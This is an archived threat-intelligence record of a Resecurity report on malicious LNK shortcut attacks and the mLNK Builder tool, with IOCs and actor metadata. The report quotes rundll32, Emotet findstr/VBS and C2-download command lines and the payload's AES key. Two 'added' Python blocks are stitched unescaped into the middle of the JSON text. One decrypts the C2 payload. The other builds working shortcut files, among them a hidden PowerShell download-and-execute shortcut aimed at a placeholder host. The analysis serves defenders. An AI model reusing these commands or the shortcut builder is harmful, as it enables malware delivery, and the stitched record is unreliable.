{
	"id": "bae92be7-a06c-4035-a342-629103ef97c1",
	"created_at": "2026-04-06T01:30:34.371591Z",
	"updated_at": "2026-04-10T13:12:45.639403Z",
	"deleted_at": null,
	"sha1_hash": "fac3b2807d83b5f9574c7ae69dd43596057c750c",
	"title": "Resecurity | Shortcut-based (LNK) attacks delivering malicious code on the rise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2501981,
	"plain_text": "Resecurity | Shortcut-based (LNK) attacks delivering malicious code on the rise\r\nPublished: 2022-07-17 · Archived: 2026-04-06 00:09:06 UTC\r\n\r\nCybercriminals are always looking for new techniques to evade security solutions. Based on the Resecurity® HUNTER assessment, attackers are actively using tools that generate malicious shortcut files (.LNK files) for payload delivery.\r\n\r\nResecurity, Inc. (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has detected an update to one of the most popular tools used by cybercriminals. The tool generates malicious LNK files and is frequently used for payload delivery these days.\r\n\r\nmLNK Builder has resurfaced on the Dark Web with a new version (4.2); the updated feature set focuses on AV evasion and on masquerading with the icons of popular legitimate applications and file formats.\r\n\r\nA notable spike in campaigns involving malicious shortcuts (LNK files), conducted by both APT groups and advanced cybercriminals, was detected in April-May this year: Bumblebee Loader, and UAC-0010 (Armageddon) activity targeting EU countries as described by CERT-UA.\r\n\r\nMalicious shortcuts continue to give network defenders a hard time, especially in the fight against global botnet and ransomware activity, which uses them as a channel for multi-stage payload delivery.\r\n\r\nAccording to Resecurity experts, existing mLNK Builder customers receive the update for free, but the authors have also released a “Private Edition” that is available only to a small circle of vetted customers and requires an additional license costing $125 per build.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 1 of 21\r\n\r\nThe updated tool provides a rich set of options for generating malicious files that appear to be legitimate Microsoft Word documents, Adobe PDF files, ZIP archives, .JPG/.PNG images, MP3 audio and even .AVI video files, as well as more advanced features for obfuscating the malicious payload.\r\n\r\nBad actors continue to develop creative ways of tricking detection mechanisms so that their payloads are delivered successfully: combinations of extensions and file formats, and Living Off the Land Binaries (LOLBins).\r\n\r\nThe malware families most actively using LNK-based distribution are TA570's Qakbot (aka QBot), IcedID, AsyncRAT and the new strain of Emotet. The most recent Qakbot distribution campaign also included malicious Word documents exploiting CVE-2022-30190 (Follina), the zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT).\r\n\r\nSome notable campaigns were detected in April-May 2022, alongside related APT activity targeting the private and public sectors:\r\n\r\n- UAC-0010 (Armageddon) Activity targeting EU Countries\r\nhttps://cert.gov.ua/article/39086\r\n\r\nThe bad actors use malicious LNK files in combination with ISO images (via extension spoofing) to confuse antivirus logic and endpoint protection solutions. At the time, files inside a mounted ISO image did not carry the Mark-of-the-Web of the downloaded container, so the shortcut ran without the SmartScreen prompt that a directly downloaded file would trigger. It is notable that well-known products in the industry are unable to properly detect and analyze them.\r\n\r\nWhat is an LNK file?\r\n\r\nA .LNK file uses the Shell Link Binary File Format (Microsoft specification MS-SHLLINK), which contains the information needed to access another data object.\r\n\r\nLNK is the filename extension for shortcuts to local files in Windows. Shortcuts provide quick access to executable files (.exe) without the user navigating to the program's full path.\r\n\r\nShell Link files contain metadata about the target, including the original path to the target application. Windows uses this data to launch applications and to store references to a target file.\r\n\r\nWe all use .LNK files as shortcuts on the Desktop, in the Control Panel, on the taskbar and in Windows Explorer.\r\n\r\nWhy attackers use LNK files\r\n\r\nSuch files typically look legitimate and may carry the same icon as an existing application or document. The bad actors place a command line (e.g. a PowerShell one-liner) in the shortcut's target and arguments, so that opening the shortcut executes the payload on the target machine.\r\n\r\nThe process of a malicious .LNK\r\n\r\nLet's review a sample of a malicious LNK file in more detail.\r\n\r\n[Figure: The malicious .LNK file]\r\n\r\nIn this example, PowerShell code is embedded in the file and is executed when the victim opens the LNK file. We examined the structure of the file using Malcat:\r\n\r\n[Figure: PowerShell code embedded inside the file]\r\n\r\n[Figure: The PowerShell scenario embedded in the file]\r\n\r\nThe script bypasses the execution policy, downloads a file from an external resource and executes it:\r\n\r\n[Figure: Bypassing the execution policy]\r\n\r\nWe observed a campaign that delivered Bumblebee through contact forms on a target's website. The messages claimed that the website used stolen images and included a link that ultimately delivered an ISO file containing the malware.\r\n\r\nResecurity attributed this campaign to a threat actor tracked as TA578, which it has followed since May 2020. TA578 uses email campaigns to deliver malware such as Ursnif, IcedID, KPOT Stealer, Buer Loader and BazaLoader, as well as Cobalt Strike.\r\n\r\nOur researchers detected another campaign in April that hijacked email threads to deliver the Bumblebee loader in replies to the target with an archived ISO attachment.\r\n\r\nLNK file executes DLL malware file\r\n\r\nThe archive is password-protected; extracting it with the password yields the ISO:\r\n\r\n[Figure: Extracting the password-protected archive]\r\n\r\nThe ISO contains a shortcut disguised as a document (the .LNK file) and namr.dll. The shortcut is analyzed in the next figure.\r\n\r\n[Figure: Analyzing the malicious .LNK file]\r\n\r\nThe .LNK file's command line executes the .DLL file.\r\n\r\nHow do attackers generate malicious LNK files?\r\n\r\nAttackers can generate malicious shortcuts with tools sold on the Dark Web. One such tool, mLNK builder, is advertised in the Telegram channel “Native-One.xyz | Products \u0026 Software | Exploit”; it converts any payload into a .LNK file.\r\n\r\n[Figure: Generation of malicious shortcut files]\r\n\r\nCybercriminals can purchase mLNK builder under one of three plans: a one-month plan, a three-month plan and a private option (providing a unique stub).\r\n\r\n[Figure: Purchasing the mLNK builder]\r\n\r\nThe price starts at $100 per month, and the seller advertises evasion of Windows Defender, SmartScreen and UAC:\r\n\r\n[Figure: mLNK tool evades Windows Defender, SmartScreen \u0026 UAC]\r\n\r\nThe advertised features of the mLNK builder include bypassing the following:\r\n1. Windows Defender\r\n2. Windows Defender memory scanning\r\n3. Windows Defender cloud scanner\r\n4. SmartScreen alerts\r\n5. AMSI, “and much more”\r\n\r\n[Figure: The features of mLNK]\r\n\r\nAfter the purchase, the author sends a text file containing the login credentials.\r\n\r\n[Figure: The text file containing the login credentials]\r\n\r\nOpening the link leads to a page that asks for the credentials sent by the author; after registration the tool can be downloaded.\r\n\r\n[Figure: Token registration]\r\n\r\nThe authors recently published a new version of the tool, free for all existing users, which adds new icons such as Documents and PDF, as we will see in this report.\r\n- https://t.me/NativeOne_Products/24224\r\n\r\nThe analysis of the tool\r\n\r\nThe tool contains two functions of interest:\r\n\r\n[Figure: Analyzing the malicious tool]\r\n\r\nExamining sub_401350 shows how the tool uses ShellExecuteA to run PowerShell code. This PowerShell script communicates with the C\u0026C server:\r\n\r\n[Figure: PowerShell communicates with C\u0026C]\r\n\r\nThe payload downloaded from the C\u0026C is decoded and then decrypted with AES. The tool decrypts it as follows:\r\n1. Download the payload from “https://native-one[.]com:4200/client_auth”.\r\n2. Take the hard-coded string 'BHDAU532BKPXTGB89G3JK6KKDSZDY8SM', convert it to bytes, compute its SHA-1, hex-encode the digest and keep the first 32 hex characters as the AES key: fc002b88fa5ccd51bfabd8c753e8aa3d.\r\n3. Convert the downloaded payload from hex (each XX pair) to a byte array and use the first 16 bytes as the AES IV.\r\n4. Decrypt with AES-256-CBC: the key is the 32-character string fc002b88fa5ccd51bfabd8c753e8aa3d used as 32 ASCII bytes (one byte per character), and the IV is 9042766da089753480c479e2b342862f decoded from hex (16 bytes).\r\n\r\n[Figure: Using AES decryption on the payload]\r\n\r\nDecrypting the payload yields a second PowerShell script that validates the credentials:\r\n\r\n[Figure: Decrypting the payload reveals the second PowerShell script]\r\n\r\nWhen the tool is executed, the email and password used to register are required once again:\r\n\r\n[Figure: After executing the tool]\r\n\r\nAfter registering with the email and password, the tool's GUI appears and payloads can be converted into .LNK files:\r\n\r\n[Figure: GUI after logging in]\r\n\r\nThe tool's folder tree contains a Decoders folder for payloads and a folder for the shortcuts of converted payloads:\r\n\r\n[Figure: The folder tree]\r\n\r\nWe created four payloads to test detection and imported them one by one to create shortcuts for them. 
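As an added example (not code from the report and not the mLNK tool's own code), the following Python reproduces the key schedule and blob layout from steps 2-4 above, so that a response captured from the client's traffic can be decrypted offline. It assumes PKCS7 padding (the .NET default) and treats the response as hex text as in step 3; because no real response is included in the report, the sample response is constructed here by encrypting a stand-in script with the same scheme. It needs the cryptography package.

```python
import hashlib
import os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Hard-coded string recovered from the mLNK client (step 2 above).
BUILDER_SECRET = 'BHDAU532BKPXTGB89G3JK6KKDSZDY8SM'

# Constructed stand-in for the second-stage PowerShell; not the script from the report.
SAMPLE_STAGE2 = 'if ($env:MLNK_USER -eq $null) { exit 1 }; Write-Output licensed'


def derive_key(secret):
    # SHA-1 the ASCII secret, hex-encode the digest and keep the first 32 hex characters.
    # The characters themselves (not the bytes they encode) become the 32-byte AES-256 key,
    # so every key byte is one of only 16 ASCII values and the key is identical for every build.
    # The report lists fc002b88fa5ccd51bfabd8c753e8aa3d for this secret.
    digest_hex = hashlib.sha1(secret.encode('ascii')).hexdigest()
    return digest_hex[:32].encode('ascii')


def split_blob(hex_blob):
    # The server response is hex text: bytes 0..15 are the CBC IV, the rest is ciphertext (step 3).
    raw = bytes.fromhex(hex_blob.strip())
    if len(raw) < 32 or len(raw) % 16:
        raise ValueError('expected iv + whole AES blocks, got %d bytes' % len(raw))
    return raw[:16], raw[16:]


def decrypt_stage(hex_blob, secret=BUILDER_SECRET):
    # AES-256-CBC with the derived key and the embedded IV (step 4); PKCS7 unpadding is an assumption.
    iv, ciphertext = split_blob(hex_blob)
    dec = Cipher(algorithms.AES(derive_key(secret)), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode('utf-8')


def make_blob(plaintext, secret=BUILDER_SECRET, iv=None):
    # Inverse of decrypt_stage, used only to fabricate a response in the same layout for testing.
    iv = iv if iv is not None else os.urandom(16)
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext.encode('utf-8')) + pad.finalize()
    enc = Cipher(algorithms.AES(derive_key(secret)), modes.CBC(iv)).encryptor()
    return (iv + enc.update(padded) + enc.finalize()).hex()


if __name__ == '__main__':
    print('aes key:', derive_key(BUILDER_SECRET).decode())
    blob = make_blob(SAMPLE_STAGE2)
    print('iv:', split_blob(blob)[0].hex())
    print('stage 2:', decrypt_stage(blob))
```

Because the key is a function of a constant shipped inside the client, the licensing exchange offers no confidentiality: anyone holding the client, or a network capture plus this routine, can recover the second stage and the credential check it performs.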
We tested detection with Windows Defender and other products. The payloads are imported as shown in the next figure.\r\n\r\n[Figure: Creating four payloads to test detection]\r\n\r\nNext we build the decoder:\r\n\r\n[Figure: Building the decoder]\r\n\r\nThe decoded payload is saved in the Decoders folder:\r\n\r\n[Figure: Saved in the Decoders folder]\r\n\r\nThen we import the URL of the decoded payload and create the .LNK:\r\n\r\n[Figure: Importing the URL of the decoded payload]\r\n\r\nNow we build the .LNK file:\r\n\r\n[Figure: Building the malicious .LNK (shortcut) file]\r\n\r\nFinally, the .LNK file appears in the shortcuts folder:\r\n\r\n[Figure: The location of the created file]\r\n\r\nExamining the shortcut's target shows how the .LNK file was built:\r\n\r\n[Figure: Examining the target file to see how it was created]\r\n\r\nThe target contains PowerShell code. 
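An added example, written for this page rather than taken from the report or from the mLNK tool: it builds a minimal Shell Link file following the format described under “What is an LNK file?”, parses it back to recover the ShowCommand and StringData fields (the target path, arguments and icon that a builder like mLNK fills in), and applies the triage a defender would run against the rundll32, cmd/findstr and PowerShell chains described in this report. The samples are constructed, the host example.invalid is a placeholder, and the LinkTargetIDList is opaque filler: real shortcuts carry the target in that list, which this parser skips rather than decodes.

```python
import struct

# ShellLinkHeader constants from MS-SHLLINK; the header is always 0x4C bytes.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex('0114020000000000c000000000000046')  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData entries in the order the spec fixes, with the LinkFlags bit announcing each.
STRING_FIELDS = (('name', 0x04), ('relative_path', 0x08), ('working_dir', 0x10),
                 ('arguments', 0x20), ('icon_location', 0x40))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight
BS = chr(92)  # a backslash, spelled out so the samples carry no escape sequences
SYS32 = '..' + BS + '..' + BS + '..' + BS + 'Windows' + BS + 'System32' + BS


def _string_data(text):
    # CountCharacters (uint16) followed by UTF-16LE characters, no terminator.
    data = text.encode('utf-16-le')
    return struct.pack('<H', len(data) // 2) + data


def build_lnk(fields, id_list=b'', show_command=1, icon_index=0):
    # Minimal Shell Link: header, optional LinkTargetIDList, StringData, terminal ExtraData block.
    flags, body = IS_UNICODE, b''
    if id_list:
        flags |= HAS_LINK_TARGET_ID_LIST
        body += struct.pack('<H', len(id_list)) + id_list
    for key, flag in STRING_FIELDS:
        if fields.get(key):
            flags |= flag
            body += _string_data(fields[key])
    header = struct.pack('<I16sIIQQQIiIHHII', HEADER_SIZE, LINK_CLSID, flags, 0, 0, 0, 0, 0,
                         icon_index, show_command, 0, 0, 0, 0)
    return header + body + bytes(4)


def parse_lnk(blob):
    # Walk the structure in spec order and return the fields a triage script cares about.
    if len(blob) < HEADER_SIZE or blob[:4] != struct.pack('<I', HEADER_SIZE) or blob[4:20] != LINK_CLSID:
        raise ValueError('not a Shell Link file')
    flags, = struct.unpack_from('<I', blob, 20)
    show_command, = struct.unpack_from('<I', blob, 60)
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) + IDList, skipped as opaque
        offset += 2 + struct.unpack_from('<H', blob, offset)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) counts itself
        offset += struct.unpack_from('<I', blob, offset)[0]
    fields, width = {'show_command': show_command}, (2 if flags & IS_UNICODE else 1)
    for key, flag in STRING_FIELDS:
        fields[key] = ''
        if flags & flag:
            count, = struct.unpack_from('<H', blob, offset)
            raw = blob[offset + 2:offset + 2 + count * width]
            if len(raw) != count * width:
                raise ValueError('truncated StringData: ' + key)
            fields[key] = raw.decode('utf-16-le' if width == 2 else 'latin-1')
            offset += 2 + len(raw)
    return fields


LOLBINS = ('powershell', 'pwsh', 'cmd.exe', 'rundll32', 'regsvr32', 'mshta', 'wscript', 'cscript',
           'certutil', 'msiexec', 'forfiles')
RISKY_ARGS = ('-ep bypass', '-executionpolicy', '-w hidden', '-enc', 'iex', 'downloadstring',
              'downloadfile', 'dllregisterserver', 'dllunregisterserver', 'findstr', '%tmp%', '.vbs', 'http')
DOC_ICONS = ('winword', 'acrord32', 'excel', 'shell32', 'imageres')


def triage_lnk(blob):
    # Heuristics for the chains in this report: a script host or rundll32 as target, loader-style
    # arguments, a hidden window, and a document icon borrowed to disguise the shortcut.
    fields = parse_lnk(blob)
    searchable = ' '.join(fields[key] for key, _ in STRING_FIELDS).lower()
    reasons = ['lolbin:' + name for name in LOLBINS if name in searchable]
    reasons += ['args:' + marker for marker in RISKY_ARGS if marker in fields['arguments'].lower()]
    if fields['show_command'] == SW_SHOWMINNOACTIVE:
        reasons.append('hidden-window')
    if reasons and any(icon in fields['icon_location'].lower() for icon in DOC_ICONS):
        reasons.append('doc-icon-masquerade')
    return fields, reasons


def sample_shortcuts():
    # Constructed samples modelled on the chains described in this report; not files from the report.
    id_list = bytes([20, 0]) + bytes(18) + bytes(2)  # one opaque 20-byte ItemID plus the TerminalID
    return {
        'powershell_downloader': build_lnk(
            {'relative_path': SYS32 + 'WindowsPowerShell' + BS + 'v1.0' + BS + 'powershell.exe',
             'arguments': '-ep bypass -w hidden -c iex (new-object net.webclient).downloadstring(http://example.invalid/s2)',
             'icon_location': '%SystemRoot%' + BS + 'system32' + BS + 'imageres.dll'},
            id_list=id_list, show_command=SW_SHOWMINNOACTIVE, icon_index=-102),
        'qakbot_rundll32': build_lnk(
            {'relative_path': SYS32 + 'rundll32.exe', 'arguments': 'scanned.dll,DllUnregisterServer',
             'icon_location': '%SystemRoot%' + BS + 'system32' + BS + 'shell32.dll'},
            show_command=SW_SHOWMINNOACTIVE),
        'emotet_findstr': build_lnk(
            {'relative_path': SYS32 + 'cmd.exe',
             'arguments': '/v:on /c findstr glKmfOKnQLYKnNs.* Datos-2504.lnk > %tmp%' + BS + 'x.vbs & %tmp%' + BS + 'x.vbs'},
            show_command=SW_SHOWMINNOACTIVE),
        'benign_notepad': build_lnk(
            {'name': 'Notepad', 'relative_path': '..' + BS + '..' + BS + 'Windows' + BS + 'notepad.exe'}),
    }


if __name__ == '__main__':
    for label, blob in sample_shortcuts().items():
        fields, reasons = triage_lnk(blob)
        print(label, '->', fields['relative_path'], fields['arguments'], reasons)
```

Run against a directory of shortcuts extracted from ISO or IMG attachments, the same check surfaces the three traits the report's samples share: a LOLBin target, a hidden window, and an icon that belongs to a document viewer rather than to the target.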
Now we want to test detection of the payload.\r\n\r\nThe attackers recently generated a new .LNK file with the PowerShell icon, which is unusual; the .LNK technique itself is now widely used. The screenshot below shows a PowerShell .LNK containing a new stage of the malware.\r\n\r\nAs observed, the newest version of mLNK Builder showed very low detection rates by popular antivirus products, which increases the effectiveness of malicious .LNK files in cyber-attacks.\r\n\r\nWe recently found Qakbot using the LNK technique in its obama187 campaign, with the chain .html \u003e .zip \u003e .img \u003e .lnk \u003e .dll. The image contains two files; the LNK runs the DLL with this command:\r\n“rundll32.exe scanned.dll,DllUnregisterServer”\r\n\r\nWe also recently observed Bumblebee using the LNK technique: OneDrive URLs -\u003e IMG -\u003e LNK -\u003e BAT -\u003e DLL. After extracting the ISO, we found that the shortcut contains the command to run the batch file, and the batch file contains the command to run the DLL (both shown in the screenshots).\r\n\r\nWe also recently caught Emotet using the technique to run VBS code via the LNK file. The LNK file contains this command:\r\n“C:\\Windows\\system32\\cmd.exe /v:on /c findstr \"glKmfOKnQLYKnNs.*\" \"Datos-2504.lnk\" \u003e \"%tmp%\\YlScZcZKeP.vbs\" \u0026 \"%tmp%\\YlScZcZKSSeP.vbs\"”\r\nThe VBS script is appended to the shortcut file itself: findstr carves out the lines tagged with the marker string, writes them to a .vbs file in %tmp%, and the second part of the command runs it.\r\n\r\nAnother SideWinder sample was also using LNK; it downloads a new stage with the command shown in the screenshot.\r\n\r\nAnother sample, related to IcedID, also used LNK with the chain ISO -\u003e LNK -\u003e DLL. The image contains these files; the shortcut disguised as a document contains the command to run the DLL, as the screenshot shows.\r\n\r\nWe have also found a new sample related to Matanbuchus. Matanbuchus Loader is a new malware-as-a-service created by a threat actor who references demonic themes in software and usernames. It appears to be a normal file but contains malicious code, as the screenshot below shows.\r\n\r\nThe malicious code pings a malicious domain, creates a new directory “ItF5”, downloads a new file disguised as an image, renames it and runs it.\r\n\r\nIOCs (MD5 and SHA-256 file hashes):\r\nfa15b97a6bb4d34e84dfb060b7114a5d\r\na4e45d28631ea2dd178f314f1362f213\r\ne82abc3b442ca4828d84ebaa3f070246\r\nd1f00a08ecedd4aed664f5a0fb74f387\r\n567dde18d84ceb426dfd181492cee959\r\nff942b936242769123c61b5b76a4c7ad\r\nbfc3995ae78a66b857863ad032a311ae\r\n3952caf999263773be599357388159e0\r\n3053114b52f1f4b51d1639f8a93a8d4a\r\nac664772dc648e84aa3bec4de0c50c6c\r\n59923950923f8d1b5c7c9241335dff8c\r\n673ecadfd3f6f348c9d676fd1ed4389a\r\n27c86be535bedfb6891068f9381660ac\r\n75d993bbd6f20b5294c89ae5125c3451\r\nd2b90fa83209f7ca05d743c037f1f78c\r\n7d8d6338cf47b62524b746ef9530b07f\r\n3ac4a01e62766d2a447a515d9b346dbb\r\n2b41c35010693c4adffb43bfca65c122\r\n7b67f5c27df1ba2fb4a2843a9a24268b\r\n6a00d0a9e6c4ec79408393984172a635\r\n51c2e7a75c14303e09b76c9812641671\r\nd1a288f0ec71789621d1f6cce42973c8\r\n4abfe9a42ef90201a6fa6945deacfc86\r\nb58e53c6120c2f33749c4f3f31d2713d\r\n86dbd6d9376cec15f624685e1349dd86\r\n625ea570a70a4640c46c8eddc2f8c562\r\n59ddeeed7cb3198f3d961df323c314517a6c0ee096b894330b9e43e4d1dc9c5b\r\n5b99c3a4c9fd79a90fd7f2d0c743de73c4a4c053fb326752c061ce5ab6a1c16f\r\nc7d4272fd706f4a07973bc644501afc0d423a9cc47c21fd4cad45686c4a7cd80\r\nD9927533C620C8A499B386A375CB93C17634801F8E216550BD840D4DBDD4C5C6\r\ne722083fbfacdea81b4e86251c004a1b90f864928af1369aa021559cb55aba75\r\n115D7891A2ABBE038C12CCC9ED3CFEEDFDD1242E51BCC67BFA22C7CC2567FB10\r\n\r\nReferences:\r\n- UAC-0010 (Armageddon) Activity targeting EU Countries\r\nhttps://cert.gov.ua/article/39086\r\n\r\nSource: https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise"
	],
	"report_names": [
		"shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "62585174-b1f8-47b1-9165-19b594160b01",
			"created_at": "2023-01-06T13:46:39.369991Z",
			"updated_at": "2026-04-10T02:00:03.304964Z",
			"deleted_at": null,
			"main_name": "TA578",
			"aliases": [],
			"source_name": "MISPGALAXY:TA578",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "52eb5fb6-706b-49c0-9ba5-43bea03940d0",
			"created_at": "2024-11-01T02:00:52.694476Z",
			"updated_at": "2026-04-10T02:00:05.410572Z",
			"deleted_at": null,
			"main_name": "TA578",
			"aliases": [
				"TA578"
			],
			"source_name": "MITRE:TA578",
			"tools": [
				"Latrodectus",
				"IcedID"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "96d5b301-0872-444c-ba32-eecf7a9241c0",
			"created_at": "2023-02-15T02:01:49.560566Z",
			"updated_at": "2026-04-10T02:00:03.347926Z",
			"deleted_at": null,
			"main_name": "TA570",
			"aliases": [
				"DEV-0450"
			],
			"source_name": "MISPGALAXY:TA570",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439034,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fac3b2807d83b5f9574c7ae69dd43596057c750c.pdf",
		"text": "https://archive.orkl.eu/fac3b2807d83b5f9574c7ae69dd43596057c750c.txt",
		"img": "https://archive.orkl.eu/fac3b2807d83b5f9574c7ae69dd43596057c750c.jpg"
	}
}